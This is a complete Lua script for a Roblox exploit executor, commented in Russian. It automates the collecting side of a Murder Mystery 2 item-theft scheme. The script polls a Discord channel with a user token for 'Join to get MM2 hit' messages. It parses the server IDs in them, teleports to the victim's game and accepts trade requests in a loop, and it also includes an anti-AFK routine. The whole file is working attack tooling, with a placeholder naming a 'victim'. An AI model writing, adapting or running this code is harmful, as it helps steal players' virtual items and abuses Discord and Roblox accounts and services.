if not game:IsLoaded() then
    game.Loaded:Wait()
    print("✅ Игра загружена")
end

-- Проверка токена и ID канала
if token == "" or channelId == "" then
    game.Players.LocalPlayer:Kick("❌ Добавь токен и channelId в скрипт!")
    return
end

-- Anti-AFK
local VirtualUser = game:GetService('VirtualUser')
game:GetService('Players').LocalPlayer.Idled:Connect(function()
    VirtualUser:CaptureController()
    VirtualUser:ClickButton2(Vector2.new())
    print("🔄 Anti-AFK активирован")
end)

local function selectDevice()
    local DeviceSelectGui = game.Players.LocalPlayer:WaitForChild("PlayerGui"):FindFirstChild("DeviceSelect")
    if DeviceSelectGui then
        local button = DeviceSelectGui.Container.Phone.Button
        local centerX = button.AbsolutePosition.X + button.AbsoluteSize.X/2
        local centerY = button.AbsolutePosition.Y + button.AbsoluteSize.Y/2
        game:GetService("VirtualInputManager"):SendMouseButtonEvent(centerX, centerY, 0, true, game, 1)
        task.wait(0.1)
        game:GetService("VirtualInputManager"):SendMouseButtonEvent(centerX, centerY, 0, false, game, 1)
        print("Выбрано устройство: Phone")
    end
end

-- Настройки файлов
local HttpService = game:GetService("HttpService")
if not isfile("user.txt") then writefile("user.txt", "victim_username") end
if not isfile("joined_ids.txt") then writefile("joined_ids.txt", "[]") end

local victimUser = readfile("user.txt")
local joinedIds = HttpService:JSONDecode(readfile("joined_ids.txt"))
local isTeleporting = false

-- Функция для парсинга команды телепортации
local function findTeleportCommand(content)
    if not content then return nil, nil end
    
    -- Ищем в формате: TeleportService:TeleportToPlaceInstance(placeId, "jobId")
    local placeId, jobId = content:match('TeleportService:TeleportToPlaceInstance%((%d+),%s*["\']([%w%-]+)["\']%)')
    
    -- Альтернативный поиск (если первый вариант не сработал)
    if not placeId or not jobId then
        placeId, jobId = content:match('game:GetService%("TeleportService"%):TeleportToPlaceInstance%((%d+),%s*["\']([%w%-]+)["\']%)')
    end
    
    return placeId, jobId
end

-- Основная функция проверки Discord
local function checkDiscord()
    local response = request({
        Url = "https://discord.com/api/v9/channels/"..channelId.."/messages?limit=5",
        Method = "GET",
        Headers = {
            ['Authorization'] = token,
            ['Content-Type'] = 'application/json'
        }
    })

    if not response.Success then
        warn("❌ Ошибка Discord API: "..response.StatusCode)
        return
    end

    local messages = HttpService:JSONDecode(response.Body)
    for _, msg in ipairs(messages) do
        if msg.embeds and msg.embeds[1] and msg.embeds[1].title:find("Join to get MM2 hit") then
            print("🔍 Найдено сообщение с хитом!")
            
            local placeId, jobId = findTeleportCommand(msg.content)
            if placeId and jobId then
                print("🎯 Найдена команда телепортации:")
                print("   PlaceID:", placeId)
                print("   JobID:", jobId)
                
                if not table.find(joinedIds, msg.id) then
                    table.insert(joinedIds, msg.id)
                    writefile("joined_ids.txt", HttpService:JSONEncode(joinedIds))
                    
                    print("🚀 Телепортация на сервер...")
                    isTeleporting = true
                    game:GetService("TeleportService"):TeleportToPlaceInstance(tonumber(placeId), jobId)
                    return
                else
                    print("⚠️ Уже присоединялись к этому хиту")
                end
            else
                print("❌ Не найдена команда телепортации в content:")
                print(msg.content)
            end
        end
    end
end

-- Автопринятие трейдов
local function autoAcceptTrade()
    while task.wait(1) do
        pcall(function()
            game:GetService("ReplicatedStorage").Trade.AcceptRequest:FireServer()
            game:GetService("ReplicatedStorage").Trade.AcceptTrade:FireServer()
        end)
    end
end

-- Запуск
task.spawn(autoAcceptTrade)

print("✨ Скрипт запущен! Ожидание новых хитов...")
while task.wait(10) do
    if not isTeleporting then
        pcall(checkDiscord)
    end
end
